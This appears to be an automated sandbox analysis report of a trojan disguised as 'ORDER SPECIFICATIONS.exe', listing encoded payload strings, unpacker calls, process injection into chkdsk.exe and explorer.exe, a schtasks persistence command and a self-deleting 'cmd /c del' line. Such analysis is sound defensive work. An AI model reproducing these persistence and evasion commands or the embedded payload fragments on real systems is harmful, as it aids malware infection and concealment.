NNElBjNNpVNXNNNRXxbNNvtzNNNXNNZROFtENNNTNPbNNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cRspTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVLDpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJRDDUTvt4NNNXNNpn1tfEPksJRjfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
Source: 4.0.ORDER SPECIFICATIONS.exe.160000.0.unpack, LogIn.cs	Base64 encoded string: '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
Source: 5.0.ORDER SPECIFICATIONS.exe.ac0000.0.unpack, LogIn.cs	Base64 encoded string: 'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbGZNRNRNNNNNVNNORNstVNNNEiUDNNPtbeNNLdRmNONONNNNNQNNNENU4QNNNRok4NNNbXXjNTXuZjNDNDNNNNONNNRDO+ONNNOT8sNNNXPvfNOvbGZNVNCNNNNNHNNORNstHNNNDHXPNNNNbYOljuptRNNUQDODNNNvtuNNNXolVNNNcmVjNNPtjVtNHNNNDNNU4SNNNRPvfNOvbGZNRNPjNNNNLNNORNstLNNNDXXjNTXvVNNbNTNNNRXyMmQNNNOvtxNNNXqNLNNNXNOjNNOPbrNvtyNNNXXtNNRmNONNfNNNNUNNNENU4UNNNRPvfNOvbNRmNONNfNNNNUNNNENPtANNNTPvfNOvc+pwfNNUPNPNNNOUV7NNOjtNxNNNElBjNNpVNXNNNRXxbNNvtzNNNXNNZROFtENNNTNPbNNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cRspTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVLDpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJRDDUTvt4NNNXNNpn1tfEPksJRjfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
Source: 5.2.ORDER SPECIFICATIONS.exe.ac0000.1.unpack, LogIn.cs	Base64 encoded string: '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

Source: classification engine

Classification label: mal100.troj.evad.winEXE@12/4@12/8

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe

File created: C:\Users\user\AppData\Roaming\LvZiFDk.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6484:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_01

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe

File created: C:\Users\user\AppData\Local\Temp\tmpDA15.tmp

Jump to behavior

Source: ORDER SPECIFICATIONS.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);

Source: ORDER SPECIFICATIONS.exe	Virustotal: Detection: 30%
Source: ORDER SPECIFICATIONS.exe	ReversingLabs: Detection: 14%

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe

File read: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
Source: unknown	Process created: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
Source: unknown	Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process created: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Process created: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe'	Jump to behavior

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ORDER SPECIFICATIONS.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ORDER SPECIFICATIONS.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: chkdsk.pdbGCTL source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298384357.0000000001480000.00000040.00000001.sdmp
Source:	Binary string: chkdsk.pdb source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298384357.0000000001480000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298571038.00000000015BF000.00000040.00000001.sdmp, chkdsk.exe, 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: ORDER SPECIFICATIONS.exe, chkdsk.exe

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: ORDER SPECIFICATIONS.exe, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: LvZiFDk.exe.0.dr, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.ORDER SPECIFICATIONS.exe.6a0000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.ORDER SPECIFICATIONS.exe.6a0000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.ORDER SPECIFICATIONS.exe.160000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.ORDER SPECIFICATIONS.exe.160000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.ORDER SPECIFICATIONS.exe.ac0000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.ORDER SPECIFICATIONS.exe.ac0000.1.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0041C9A6 pushfd ; ret	5_2_0041C9A7
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_00407206 push es; retf	5_2_00407209
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0041B3F2 push eax; ret	5_2_0041B3F8
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0041B3FB push eax; ret	5_2_0041B462
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0041B3A5 push eax; ret	5_2_0041B3F8
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0041B45C push eax; ret	5_2_0041B462
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0040CC22 pushad ; retf	5_2_0040CC2C
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_00415597 push ss; retf	5_2_00415598
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0040B6F8 push ecx; ret	5_2_0040B6F9
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0151D0D1 push ecx; ret	5_2_0151D0E4
Source: C:\Windows\explorer.exe	Code function: 7_2_06FE1EFD push esp; retf	7_2_06FE1EFE
Source: C:\Windows\explorer.exe	Code function: 7_2_06FE0268 push ecx; ret	7_2_06FE027C
Source: C:\Windows\explorer.exe	Code function: 7_2_06FE2C56 push ebp; retf	7_2_06FE2C5A
Source: C:\Windows\explorer.exe	Code function: 7_2_06FE4657 push esi; iretd	7_2_06FE4661
Source: C:\Windows\explorer.exe	Code function: 7_2_06FE2E40 push es; retf	7_2_06FE2E50
Source: C:\Windows\explorer.exe	Code function: 7_2_06FE0621 push edx; iretd	7_2_06FE063C
